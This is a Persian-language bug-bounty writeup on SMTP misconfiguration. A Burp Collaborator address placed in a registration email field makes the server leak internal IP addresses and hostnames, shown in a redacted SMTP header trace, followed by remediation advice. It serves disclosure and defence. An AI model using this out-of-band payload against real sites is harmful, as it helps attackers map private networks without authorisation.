رایتاپ
SMTP Misconfiguration Writeup

این رایتاپ بر اساس سناریوهای دریافت شده از متخصصین امنیتی باگدشت با هدف اشتراک گذاری دانش امنیتی و تسریع در ایمن سازی ارایه شده است.

اکسپلویت آسیب‌پذیری عدم پیکربندی مناسب SMTP و دسترسی به اطلاعات شبکه.

 

این آسیب‌پذیری زمانی رخ می‌دهد که در سرور محدودیتی جهت نمایش اطلاعات حساس در هنگام بازگشت اطلاعات انجام نشده باشد.  


مراحل بررسی:

طی بررسی انجام شده بر روی دامنه https://example.com در بخش ثبت نام با استفاده از burpcollaborator در فیلد ایمیل هنگام ثبت نام اطلاعاتی از سمت سرور SMTP برگشت داده میشود که شامل ip  ها و دامنه های  (اینترانت / داخلی / پرایویت) میباشد .

  • هنگام ثبت نام در بخش ایمیل پیلود زیر را به جای ایمیل حقیقی قرار داده شود.
  • Test1@burpcollaborator.com

نکته: مسیر Burpcollaborator خود را بعد از کاراکتر @ قرار دهید تا اطلاعات سمت سرور و مسیر طی شده به سمت Burpcollaborator هدایت شود. 

  • در فیلد ایمیل قرار دهید و مراحل ثبت نام را تکمیل کنید.
  • اطلاعات به صورت Trace شده از ابتدا تا انتها به سمت ما برگشت داده شد.
  • این اطلاعات شامل آدرس‌های IP داخلی سازمان است. 
 220 burpcollaborator.net Burp Collaborator Server ready EHLO mail.example.com DATA 354 Send data Received: from 1.example.com (x.x.x.x) by 1.example.com (x.x.x.x) with Microsoft SMTP Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id x.x.x.x; Tue, 31 Aug 2021 21:56:30 +0430 Received: from 1.example.com (x.x.x.x) by 1.example.com (x.x.x.x) with Microsoft SMTP Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id x.x.x.x; Tue, 31 Aug 2021 21:56:27 +0430 Received: from 2.example.ir (x.x.x.x) by 2.example.ir (x.x.x.x) with Microsoft SMTP Server id x.x.x.x via Frontend Transport; Tue, 31 Aug 2021 21:56:27 +0430 ...

راهکار ایمن سازی:

  • پیکربندی صحیح SMTP جهت افشای آیپی‌های داخلی سازمان
  • ایجاد یک Whitelist جهت Input validation. برای مثال، ایمیل attacker@evil.com باید نامعتبر باشد و user@gmail.com معتبر.